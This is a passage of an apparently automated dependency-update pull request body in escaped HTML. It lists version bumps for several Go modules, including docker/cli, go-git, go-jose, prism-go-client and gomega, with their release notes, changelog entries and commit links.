view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `github.com/docker/cli` from 29.2.0+incompatible to 29.4.0+incompatible\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/docker/cli/commit/9d7ad9ff180b43ae5577d048a7bac1159ce7bacf\"\u003e\u003ccode\u003e9d7ad9f\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/docker/cli/issues/6911\"\u003e#6911\u003c/a\u003e from thaJeztah/bump_modules\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/docker/cli/commit/c88681f8d89a9dd1f24f7bbd4df947aed2e4faf3\"\u003e\u003ccode\u003ec88681f\u003c/code\u003e\u003c/a\u003e vendor: moby/api v1.54.1, moby/client v0.4.0\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/docker/cli/commit/84b884f383a427627ea2c40c1a31905cd958384f\"\u003e\u003ccode\u003e84b884f\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/docker/cli/issues/6909\"\u003e#6909\u003c/a\u003e from thaJeztah/update_authors_mailmap\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/docker/cli/commit/d6169a5ea986d888d0e8c51c9c891d774aa7657b\"\u003e\u003ccode\u003ed6169a5\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/docker/cli/issues/6910\"\u003e#6910\u003c/a\u003e from thaJeztah/update_version\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/docker/cli/commit/5ddc1553ae6d435203f40f7bf622062df246071a\"\u003e\u003ccode\u003e5ddc155\u003c/code\u003e\u003c/a\u003e bump version to v29.4.0-dev\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/docker/cli/commit/a347d9e103f0be3170dc18d0ec77e788c7fe9749\"\u003e\u003ccode\u003ea347d9e\u003c/code\u003e\u003c/a\u003e update AUTHORS and .mailmap\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/docker/cli/commit/699b029b57bc31f2a0c5ecff00f89493b2448047\"\u003e\u003ccode\u003e699b029\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/docker/cli/issues/6908\"\u003e#6908\u003c/a\u003e from thaJeztah/bump_runewidth\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/docker/cli/commit/512607a39638c961cff762c3239b3d1127e25e16\"\u003e\u003ccode\u003e512607a\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/docker/cli/issues/6889\"\u003e#6889\u003c/a\u003e from YoanWai/docs/prune-filter-behavior\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/docker/cli/commit/5fca671ef4110b2bebce70be06a1d41241933871\"\u003e\u003ccode\u003e5fca671\u003c/code\u003e\u003c/a\u003e vendor: github.com/mattn/go-runewidth v0.0.22\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/docker/cli/commit/753b10228f353c3a8cd90e7e0292ee732798e8d5\"\u003e\u003ccode\u003e753b102\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/docker/cli/issues/6893\"\u003e#6893\u003c/a\u003e from thaJeztah/bump_moby\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/docker/cli/compare/v29.2.0...v29.4.0\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `github.com/go-git/go-git/v5` from 5.17.1 to 5.17.2\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/go-git/go-git/releases\"\u003egithub.com/go-git/go-git/v5's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev5.17.2\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003ebuild: Update module github.com/go-git/go-git/v5 to v5.17.1 [SECURITY] (releases/v5.x) by \u003ca href=\"https://github.com/go-git-renovate\"\u003e\u003ccode\u003e@​go-git-renovate\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/go-git/go-git/pull/1941\"\u003ego-git/go-git#1941\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003edotgit: skip writing pack files that already exist on disk by \u003ca href=\"https://github.com/pjbgf\"\u003e\u003ccode\u003e@​pjbgf\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/go-git/go-git/pull/1944\"\u003ego-git/go-git#1944\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e:warning: This release fixes a bug (\u003ca href=\"https://redirect.github.com/go-git/go-git/issues/1942\"\u003ego-git/go-git#1942\u003c/a\u003e) that blocked some users from upgrading to \u003ccode\u003ev5.17.1\u003c/code\u003e. Thanks \u003ca href=\"https://github.com/pskrbasu\"\u003e\u003ccode\u003e@​pskrbasu\u003c/code\u003e\u003c/a\u003e for reporting it. :bow:\u003c/p\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/go-git/go-git/compare/v5.17.1...v5.17.2\"\u003ehttps://github.com/go-git/go-git/compare/v5.17.1...v5.17.2\u003c/a\u003e\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/go-git/go-git/commit/45ae193b3a60aa8ec8a3e373f7265a7819473d5f\"\u003e\u003ccode\u003e45ae193\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/go-git/go-git/issues/1944\"\u003e#1944\u003c/a\u003e from go-git/fix-perms\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/go-git/go-git/commit/fda4f7464b597ff33d2dea1c026482a5e900037c\"\u003e\u003ccode\u003efda4f74\u003c/code\u003e\u003c/a\u003e storage: filesystem/dotgit, Skip writing pack files that already exist on disk\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/go-git/go-git/commit/2212dc7caeb2a389fe2129923811ef63f75a557a\"\u003e\u003ccode\u003e2212dc7\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/go-git/go-git/issues/1941\"\u003e#1941\u003c/a\u003e from go-git/renovate/releases/v5.x-go-github.com-go-...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/go-git/go-git/commit/ebb2d7da7f5d5aebeaa0b5e13276d72d602c1ae3\"\u003e\u003ccode\u003eebb2d7d\u003c/code\u003e\u003c/a\u003e build: Update module github.com/go-git/go-git/v5 to v5.17.1 [SECURITY]\u003c/li\u003e\n\u003cli\u003eSee full diff in \u003ca href=\"https://github.com/go-git/go-git/compare/v5.17.1...v5.17.2\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `github.com/go-jose/go-jose/v3` from 3.0.4 to 3.0.5\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/go-jose/go-jose/releases\"\u003egithub.com/go-jose/go-jose/v3's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev3.0.5\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cp\u003eFixes \u003ca href=\"https://github.com/go-jose/go-jose/security/advisories/GHSA-78h2-9frx-2jm8\"\u003ehttps://github.com/go-jose/go-jose/security/advisories/GHSA-78h2-9frx-2jm8\u003c/a\u003e\u003c/p\u003e\n\u003cp\u003eWe recommend migrating from v3 to v4, and we will stop support v3 in the near future.\u003c/p\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/go-jose/go-jose/compare/v3.0.4...v3.0.5\"\u003ehttps://github.com/go-jose/go-jose/compare/v3.0.4...v3.0.5\u003c/a\u003e\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/go-jose/go-jose/commit/be2f6548701d4ba561cd61c7d4a2f1289b66c273\"\u003e\u003ccode\u003ebe2f654\u003c/code\u003e\u003c/a\u003e ci: update Go versions for GHA workflows (\u003ca href=\"https://redirect.github.com/go-jose/go-jose/issues/221\"\u003e#221\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/go-jose/go-jose/commit/02464163e1e891db85257cb8860978a1c0226016\"\u003e\u003ccode\u003e0246416\u003c/code\u003e\u003c/a\u003e Merge commit from fork\u003c/li\u003e\n\u003cli\u003eSee full diff in \u003ca href=\"https://github.com/go-jose/go-jose/compare/v3.0.4...v3.0.5\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `github.com/nutanix-cloud-native/prism-go-client` from 0.3.4 to 0.7.1\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/nutanix-cloud-native/prism-go-client/releases\"\u003egithub.com/nutanix-cloud-native/prism-go-client's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev0.7.1\u003c/h2\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003ch3\u003eFeatures\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003efeat: Adding changes to support error handling by \u003ca href=\"https://github.com/adarshanand25\"\u003e\u003ccode\u003e@​adarshanand25\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/nutanix-cloud-native/prism-go-client/pull/344\"\u003enutanix-cloud-native/prism-go-client#344\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003efeat: add DeleteCdRom and GenerateConsoleToken to VMs service by \u003ca href=\"https://github.com/adarshanand25\"\u003e\u003ccode\u003e@​adarshanand25\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/nutanix-cloud-native/prism-go-client/pull/343\"\u003enutanix-cloud-native/prism-go-client#343\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/nutanix-cloud-native/prism-go-client/compare/v0.7.0...v0.7.1\"\u003ehttps://github.com/nutanix-cloud-native/prism-go-client/compare/v0.7.0...v0.7.1\u003c/a\u003e\u003c/p\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003ch3\u003eFeatures\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003efeat: Adding changes to support error handling by \u003ca href=\"https://github.com/adarshanand25\"\u003e\u003ccode\u003e@​adarshanand25\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/nutanix-cloud-native/prism-go-client/pull/344\"\u003enutanix-cloud-native/prism-go-client#344\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003efeat: add DeleteCdRom and GenerateConsoleToken to VMs service by \u003ca href=\"https://github.com/adarshanand25\"\u003e\u003ccode\u003e@​adarshanand25\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/nutanix-cloud-native/prism-go-client/pull/343\"\u003enutanix-cloud-native/prism-go-client#343\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/nutanix-cloud-native/prism-go-client/compare/v0.7.0...v0.7.1\"\u003ehttps://github.com/nutanix-cloud-native/prism-go-client/compare/v0.7.0...v0.7.1\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003ev0.7.0\u003c/h2\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003ch3\u003eFeatures\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003efeat: API keys transparent basic authentication in prism-go-client by \u003ca href=\"https://github.com/abhay-nutanix\"\u003e\u003ccode\u003e@​abhay-nutanix\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/nutanix-cloud-native/prism-go-client/pull/304\"\u003enutanix-cloud-native/prism-go-client#304\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003efeat: Add v4 IAM Users API by \u003ca href=\"https://github.com/dlipovetsky\"\u003e\u003ccode\u003e@​dlipovetsky\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/nutanix-cloud-native/prism-go-client/pull/219\"\u003enutanix-cloud-native/prism-go-client#219\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003efeat: implement SubnetIPReservation in converged client (NCN-111641) by \u003ca href=\"https://github.com/adarshanand25\"\u003e\u003ccode\u003e@​adarshanand25\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/nutanix-cloud-native/prism-go-client/pull/316\"\u003enutanix-cloud-native/prism-go-client#316\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003efeat: Implement List and Get methods for Users service by \u003ca href=\"https://github.com/adarshanand25\"\u003e\u003ccode\u003e@​adarshanand25\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/nutanix-cloud-native/prism-go-client/pull/317\"\u003enutanix-cloud-native/prism-go-client#317\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003efeat: Implement DomainManager service with GetPrismCentralVersion by \u003ca href=\"https://github.com/adarshanand25\"\u003e\u003ccode\u003e@​adarshanand25\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/nutanix-cloud-native/prism-go-client/pull/318\"\u003enutanix-cloud-native/prism-go-client#318\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003efix: removed usused Karbon/NKE APIs and renamed in-use APIs to Konnector by \u003ca href=\"https://github.com/manoj-nutanix\"\u003e\u003ccode\u003e@​manoj-nutanix\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/nutanix-cloud-native/prism-go-client/pull/325\"\u003enutanix-cloud-native/prism-go-client#325\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003efeat: add Images, Templates, and OVAs services for V4 packer migration by \u003ca href=\"https://github.com/adarshanand25\"\u003e\u003ccode\u003e@​adarshanand25\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/nutanix-cloud-native/prism-go-client/pull/327\"\u003enutanix-cloud-native/prism-go-client#327\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003efix: V4 API fixes for Objects Lite upload and configurable timeouts  by \u003ca href=\"https://github.com/adarshanand25\"\u003e\u003ccode\u003e@​adarshanand25\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/nutanix-cloud-native/prism-go-client/pull/328\"\u003enutanix-cloud-native/prism-go-client#328\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003efeat: Adding api call to add customAttributes to VM by \u003ca href=\"https://github.com/abhay-nutanix\"\u003e\u003ccode\u003e@​abhay-nutanix\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/nutanix-cloud-native/prism-go-client/pull/334\"\u003enutanix-cloud-native/prism-go-client#334\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eNote\u003c/h3\u003e\n\u003cp\u003eThis prism-go-client release requires minimum PC and AOS versions v7.5. For older PC and AOS versions, please use prism-go-client v0.6.x\u003c/p\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/nutanix-cloud-native/prism-go-client/compare/v0.6.3...v0.7.0\"\u003ehttps://github.com/nutanix-cloud-native/prism-go-client/compare/v0.6.3...v0.7.0\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003ev0.6.4\u003c/h2\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003ch2\u003eNew Contributors\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/Vedansh074\"\u003e\u003ccode\u003e@​Vedansh074\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/nutanix-cloud-native/prism-go-client/pull/350\"\u003enutanix-cloud-native/prism-go-client#350\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/nutanix-cloud-native/prism-go-client/compare/v0.6.3...v0.6.4\"\u003ehttps://github.com/nutanix-cloud-native/prism-go-client/compare/v0.6.3...v0.6.4\u003c/a\u003e\u003c/p\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/nutanix-cloud-native/prism-go-client/blob/main/CHANGELOG.md\"\u003egithub.com/nutanix-cloud-native/prism-go-client's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch1\u003eChangelog\u003c/h1\u003e\n\u003cp\u003eAll notable changes to this project will be documented in this file.\u003c/p\u003e\n\u003cp\u003eThe format is based on \u003ca href=\"https://keepachangelog.com/en/1.0.0/\"\u003eKeep a Changelog\u003c/a\u003e,\nand this project adheres to \u003ca href=\"https://semver.org/spec/v2.0.0.html\"\u003eSemantic Versioning\u003c/a\u003e.\u003c/p\u003e\n\u003ch2\u003e[v0.6.1]\u003c/h2\u003e\n\u003ch3\u003eAdded\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eAdd transparent Basic authentication via API keys in prism-go-client\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e[v0.6.0]\u003c/h2\u003e\n\u003ch3\u003eAdded\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eAdd methods for Idempotence Identifiers API in v3\u003c/li\u003e\n\u003cli\u003eAPI key based authentication support in v3\u003c/li\u003e\n\u003cli\u003eAdd client method to fetch kubeconfig in Karbon\u003c/li\u003e\n\u003cli\u003eAdd converged client as utility wrapper for v4\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eChanged\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eUpdate the underlying struct used for Cluster to swagger-generated in v3\u003c/li\u003e\n\u003cli\u003eSwitch to go-swagger generated structs for recovery plan\u003c/li\u003e\n\u003cli\u003eChange the underlying API/Client used for StorageContainers in v4\u003c/li\u003e\n\u003cli\u003eAdd defensive code to avoid panics\u003c/li\u003e\n\u003cli\u003eMove ClientOptions to environment/types\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eRemoved\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eRemove clients for fc \u0026amp; foundation\u003c/li\u003e\n\u003cli\u003eRemove utils package\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e[v0.5.5]\u003c/h2\u003e\n\u003ch3\u003eFixed\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eBugfix: Remove pagination handling in ListAllHost as endpoint doesn't support pagination\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e[v0.5.4]\u003c/h2\u003e\n\u003ch3\u003eFixed\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eBugfix: Add defensive validation in v3 and v4 cache GetOrCreate to prevent panics when ManagementEndpoint has nil Address or empty required fields\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e[v0.5.3]\u003c/h2\u003e\n\u003ch3\u003eAdded\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eAdded support for authenticating using API key based authentication.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e[v0.5.2]\u003c/h2\u003e\n\u003ch3\u003eAdded\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eAdded support for creating, deleting, and listing idempotence identifiers.\u003c/li\u003e\n\u003cli\u003eadded the new v4 storage container client from clustermgmt namespace as it is based on the v4 beta APIs.\u003c/li\u003e\n\u003cli\u003eAdded support for authenticating using API key based authentication.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eChanged\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eUpdate the v3 VM structs to include VM vTPM configuration.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eRemoved\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eRemoved the v4 storage container client from storage namespace as it was based on the v4 alpha APIs which are no longer supported.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nutanix-cloud-native/prism-go-client/commit/d66a76f1aec01d16e09309e3301ba0cd602a8f17\"\u003e\u003ccode\u003ed66a76f\u003c/code\u003e\u003c/a\u003e converged: add DeleteCdRom and GenerateConsoleToken to VMs service\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nutanix-cloud-native/prism-go-client/commit/0104740467e050461f068ebe465fc057af09f283\"\u003e\u003ccode\u003e0104740\u003c/code\u003e\u003c/a\u003e Adding changes to support error handling\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nutanix-cloud-native/prism-go-client/commit/c121d041c92a637edaaed197419192aa79a88141\"\u003e\u003ccode\u003ec121d04\u003c/code\u003e\u003c/a\u003e feat: Adding api call to add customAttributes to VM (\u003ca href=\"https://redirect.github.com/nutanix-cloud-native/prism-go-client/issues/334\"\u003e#334\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nutanix-cloud-native/prism-go-client/commit/2a1c8de076a0786faa16f7ee2cd03f3d8e474e77\"\u003e\u003ccode\u003e2a1c8de\u003c/code\u003e\u003c/a\u003e chore: bump jetlify action to v0.14.0 (\u003ca href=\"https://redirect.github.com/nutanix-cloud-native/prism-go-client/issues/332\"\u003e#332\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nutanix-cloud-native/prism-go-client/commit/2bbbcd3103a542465227608d314804befbbcd3c1\"\u003e\u003ccode\u003e2bbbcd3\u003c/code\u003e\u003c/a\u003e fix: V4 API fixes for Objects Lite upload and configurable timeouts  (\u003ca href=\"https://redirect.github.com/nutanix-cloud-native/prism-go-client/issues/328\"\u003e#328\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nutanix-cloud-native/prism-go-client/commit/8b4db79f4c6750828da9466c0d49e74986b447a7\"\u003e\u003ccode\u003e8b4db79\u003c/code\u003e\u003c/a\u003e feat: add Images, Templates, and OVAs services for V4 packer migration (\u003ca href=\"https://redirect.github.com/nutanix-cloud-native/prism-go-client/issues/327\"\u003e#327\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nutanix-cloud-native/prism-go-client/commit/75efe03848ff09e1a6a00b8e06247d546986d677\"\u003e\u003ccode\u003e75efe03\u003c/code\u003e\u003c/a\u003e fix: removed usused Karbon APIs and renames in-use APIs to Konnector (\u003ca href=\"https://redirect.github.com/nutanix-cloud-native/prism-go-client/issues/325\"\u003e#325\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nutanix-cloud-native/prism-go-client/commit/d23758422537995b8c946153f5d2bf949b430a55\"\u003e\u003ccode\u003ed237584\u003c/code\u003e\u003c/a\u003e fix(bumup): updating ntnx-api-golang-clients to latest versions (\u003ca href=\"https://redirect.github.com/nutanix-cloud-native/prism-go-client/issues/323\"\u003e#323\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nutanix-cloud-native/prism-go-client/commit/d8d91a890f00890b90ee61560e7400c07a601e75\"\u003e\u003ccode\u003ed8d91a8\u003c/code\u003e\u003c/a\u003e feat: Implement DomainManager service with GetPrismCentralVersion (\u003ca href=\"https://redirect.github.com/nutanix-cloud-native/prism-go-client/issues/318\"\u003e#318\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nutanix-cloud-native/prism-go-client/commit/037b98630f382132c9d896e721d01e61da3650c9\"\u003e\u003ccode\u003e037b986\u003c/code\u003e\u003c/a\u003e feat: Implement List and Get methods for Users service (\u003ca href=\"https://redirect.github.com/nutanix-cloud-native/prism-go-client/issues/317\"\u003e#317\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/nutanix-cloud-native/prism-go-client/compare/v0.3.4...v0.7.1\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `github.com/onsi/gomega` from 1.38.2 to 1.39.1\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/onsi/gomega/releases\"\u003egithub.com/onsi/gomega's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev1.39.1\u003c/h2\u003e\n\u003ch2\u003e1.39.1\u003c/h2\u003e\n\u003cp\u003eUpdate all dependencies.  This auto-updated the required version of Go to 1.24, consistent with the fact that Go 1.23 has been out of support for almost six months.\u003c/p\u003e\n\u003ch2\u003ev1.39.0\u003c/h2\u003e\n\u003ch2\u003e1.39.0\u003c/h2\u003e\n\u003ch3\u003eFeatures\u003c/h3\u003e\n\u003cp\u003eAdd \u003ccode\u003eMatchErrorStrictly\u003c/code\u003e which only passes if \u003ccode\u003eerrors.Is(actual, expected)\u003c/code\u003e returns true.  \u003ccode\u003eMatchError\u003c/code\u003e, by contrast, will fallback to string comparison.\u003c/p\u003e\n\u003ch2\u003ev1.38.3\u003c/h2\u003e\n\u003ch2\u003e1.38.3\u003c/h2\u003e\n\u003ch3\u003eFixes\u003c/h3\u003e\n\u003cp\u003emake string formatitng more consistent for users who use format.Object directly\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/onsi/gomega/blob/master/CHANGELOG.md\"\u003egithub.com/onsi/gomega's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e1.39.1\u003c/h2\u003e\n\u003cp\u003eUpdate all dependencies.  This auto-updated the required version of Go to 1.24, consistent with the fact that Go 1.23 has been out of support for almost six months.\u003c/p\u003e\n\u003ch2\u003e1.39.0\u003c/h2\u003e\n\u003ch3\u003eFeatures\u003c/h3\u003e\n\u003cp\u003eAdd \u003ccode\u003eMatchErrorStrictly\u003c/code\u003e which only passes if \u003ccode\u003eerrors.Is(actual, expected)\u003c/code\u003e returns true.  \u003ccode\u003eMatchError\u003c/code\u003e, by contrast, will fallback to string comparison.\u003c/p\u003e\n\u003ch2\u003e1.38.3\u003c/h2\u003e\n\u003ch3\u003eFixes\u003c/h3\u003e\n\u003cp\u003emake string formatitng more consistent for users who use format.Object directly\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/onsi/gomega/commit/1a25a36414f51967615277623eed3b85b0ca6ce8\"\u003e\u003ccode\u003e1a25a36\u003c/code\u003e\u003c/a\u003e v1.39.1\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/onsi/gomega/commit/406faee2de82aa2584ea4d76b0e2662f70ae4d2c\"\u003e\u003ccode\u003e406faee\u003c/code\u003e\u003c/a\u003e bump all deps\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/onsi/gomega/commit/49561ad293853e660030f8397b07607127e3ebb7\"\u003e\u003ccode\u003e49561ad\u003c/code\u003e\u003c/a\u003e v1.39.0\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/onsi/gomega/commit/8f7f42585ccc794dcb3a4979ac7d67e00fb070ae\"\u003e\u003ccode\u003e8f7f425\u003c/code\u003e\u003c/a\u003e document MatchErrorStrictly\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/onsi/gomega/commit/bae643da0469185d9502e8d7528da137f4c62320\"\u003e\u003ccode\u003ebae643d\u003c/code\u003e\u003c/a\u003e add matcher relecting errors.Is 